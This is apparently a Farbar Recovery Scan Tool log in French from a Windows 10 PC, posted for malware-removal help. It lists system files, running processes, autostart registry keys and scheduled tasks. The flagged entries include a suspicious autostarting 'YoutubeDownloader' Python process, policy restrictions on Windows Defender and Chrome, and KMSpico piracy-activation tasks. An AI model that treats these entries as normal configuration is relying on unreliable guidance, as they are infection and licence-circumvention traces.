2019-05-09 20:14 - 2019-05-09 20:14 - 000316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxdiag.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000263576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\spacebridge.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\system32\fcon.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000109568 _____ C:\WINDOWS\system32\uwfcfgmgmt.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000101376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\EduPrintProv.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssecuser.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\EASPolicyManagerBrokerHost.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDSPnf.exe
2019-05-09 20:14 - 2019-05-09 20:14 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\nshhttp.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000039936 _____ (Microsoft Corporation) C:\WINDOWS\system32\perfts.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshhttp.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2019-05-09 20:14 - 2019-05-09 20:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\perfts.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 015223296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 009683472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 007883776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 007645632 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 006925824 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 006544256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 006440960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 006309040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 005765120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 005296640 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 005210904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 004866560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AI.MachineLearning.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 004704272 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupapi.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 004588544 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 004527624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupapi.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 004304896 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003982848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003657728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 003496448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AI.MachineLearning.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003426816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003384832 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 003377976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 003334144 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002925880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 002871304 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 002842624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002777224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002765312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002701512 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002689024 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002627384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 002469376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 002438368 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002346496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002275888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002189312 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002073960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 002042368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.CloudStore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001994976 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001969464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refs.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 001918464 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001860096 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001844448 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001830200 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpserverbase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001768960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001760768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001711104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001701888 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001697960 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2019-05-09 20:13 - 2019-05-09 20:13 - 001687552 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001674696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001671680 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001671352 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001653760 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001647632 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001641400 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001615872 ____R (The ICU Project) C:\WINDOWS\SysWOW64\icuin.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001605120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001590064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpserverbase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001506304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001484800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001478968 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpbase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001469168 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 001467552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001458056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001395056 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvruserservice.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001382912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001370624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001360184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 001342400 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2019-05-09 20:13 - 2019-05-09 20:13 - 001315328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001311232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001256448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001249280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001221944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpbase.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001179680 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 001155072 ____R (The ICU Project) C:\WINDOWS\SysWOW64\icuuc.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001133568 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001072640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001058304 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2019-05-09 20:13 - 2019-05-09 20:13 - 001057792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 001054928 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplyTrustOffline.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 001035776 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001026792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 001001472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000998712 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 000984888 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 000982528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Vpn.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000981816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refsv1.sys
2019-05-09 20:13 - 2019-05-09 20:13 - 000976896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000964096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000948224 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000927232 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000926208 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000909840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 000888320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2019-05-09 20:13 - 2019-05-09 20:13 - 000882176 _____ (Microsoft Corporation) C:\WINDOWS\system32\BFE.DLL
2019-05-09 20:13 - 2019-05-09 20:13 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2019-05-09 20:13 - 2019-05-09 20:13 - 000874496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer
Exécuté par lenor (administrateur) sur DESKTOP-JTGIDI3 (10-05-2019 09:12:34)
Exécuté depuis C:\Users\lenor\Downloads
Profils chargés: lenor (Profils disponibles: lenor & Administrateur)
Platform: Windows 10 Pro Version 1809 17763.475 (X64) Langue: Français (France)
Navigateur par défaut: Edge
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
() [Fichier non signé] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
() [Fichier non signé] C:\Program Files\WindowsApps\Microsoft.YourPhone_1.19041.481.0_x64__8wekyb3d8bbwe\YourPhone.exe
(Adobe Systems, Incorporated -> Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\acrotray.exe
(Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\atiesrxx.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe
(AVB Disc Soft, SIA -> Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DTAgent.exe
(CyberLink -> ) C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(LogMeIn, Inc. -> LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
(Microsoft Corporation -> © 2015 Microsoft Corporation) C:\Users\lenor\AppData\Local\Microsoft\BingSvc\BingSvc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11425.20190.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11425.20190.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.1904.1-0\MsMpEng.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) [Fichier non signé] C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.44.40.0_x64__kzf8qxf38zg5c\SkypeApp.exe
(Microsoft Corporation) [Fichier non signé] C:\Program Files\WindowsApps\Microsoft.WindowsStore_11904.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeCP.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\MicrosoftEdgeSH.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SppExtComObj.Exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Windows Hardware Compatibility Publisher -> Sonix) C:\Windows\vsnp2std.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Python Software Foundation -> Python Software Foundation) C:\Users\lenor\AppData\Roaming\YoutubeDownloader\python\python.exe
(VIA Technologies, Inc -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
==================== Registre (Avec liste blanche) ===========================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [snp2std] => C:\WINDOWS\vsnp2std.exe [675840 2006-09-15] (Microsoft Windows Hardware Compatibility Publisher -> Sonix)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-01-07] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2675176 2018-12-13] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [tsnp2std] => C:\Windows\tsnp2std.exe [258048 2007-01-05] (SONIX) [Fichier non signé]
HKLM-x32\...\Run: [BrMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1163264 2012-09-25] () [Fichier non signé]
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.) [Fichier non signé]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe [3500056 2017-11-01] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5890504 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [BingSvc] => C:\Users\lenor\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-05] (Microsoft Corporation -> © 2015 Microsoft Corporation)
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3152160 2019-04-17] (Valve -> Valve Corporation)
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [22515488 2019-04-04] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [731240 2018-12-17] (AVB Disc Soft, SIA -> Disc Soft Ltd)
HKU\S-1-5-21-1452226929-484460335-584983045-1001\...\Run: [YoutubeDownloader] => C:\Users\lenor\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation -> Python Software Foundation) <==== ATTENTION
IFEO\OSppSvc.exe: [Debugger] ***@***
Startup: C:\Users\lenor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Envoyer à OneNote.lnk [2018-06-17]
ShortcutTarget: Envoyer à OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\lenor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WatchDog.lnk [2018-02-13]
ShortcutTarget: WatchDog.lnk -> C:\iSmartViewPlus\WatchDog.exe (Shenzhen Smarteye Digital Electronics Co., Ltd) [Fichier non signé]
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {040F1800-D0C2-4520-AD85-5FB1BDE6417C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335872 2019-03-12] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {211F1232-FDFE-4925-8167-CBAB9C10B140} - System32\Tasks\{6C77685D-7F00-4C1E-AEE5-91A62F78D5AD} => "c:\program files\internet explorer\iexplore.exe" hxxps://ui.skype.com/ui/0/7.41.0.101/fr/abandoninstall?page=tsMain
Task: {2A26951C-498C-4BDF-BF0A-72D844803E2E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {2AB1A2D9-72C8-48C6-BF11-9FB4A0654879} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {2C0DD536-7EF3-4CCF-A4F6-7AC6F8C451E1} - System32\Tasks\YoutubeDownloader => C:\Users\lenor\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation -> Python Software Foundation) <==== ATTENTION
Task: {3024A2E8-0D46-467B-9701-1BD5889F12FE} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe [480352 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {3D2B13DF-DE9F-4BFC-BB29-F1D85BD1BF62} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [2380088 2019-04-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {3E09A70A-EC0E-4756-9E31-146B6C3455E1} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-09-22] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {40E135C0-A21D-4069-A0BF-06A411388531} - System32\Tasks\R@1n-KMS\Windows64Professional => wmic path SoftwareLicensingProduct where (ID="2de67392-b7a7-462a-b1ca-108dd189f588") call Activate
Task: {4F208EA8-779E-4B31-995F-2AF46796A2FA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1904.1-0\MpCmdRun.exe [480352 2019-04-23] (Microsoft Corporation -> Microsoft Corporation)
Task: {53FA6470-6C4B-48F7-949D-9A0EE43A2CF5} - System32\Tasks\{3F7FF5BB-9B22-444D-872C-B464C65A7AFA} => "c:\windows\system32\launchwinapp.exe" hxxps://ui.skype.com/ui/0/7.32.0.104/fr/go/help.faq.installer?LastError=1618
Task: {5820068A-6E18-4724-B116-EB6325CC3561} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe
Task: {6F6AE38A-CD1D-4059-98FB-CEFF93E670C3} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [39920 2018-10-24] (Garmin International, Inc. -> )
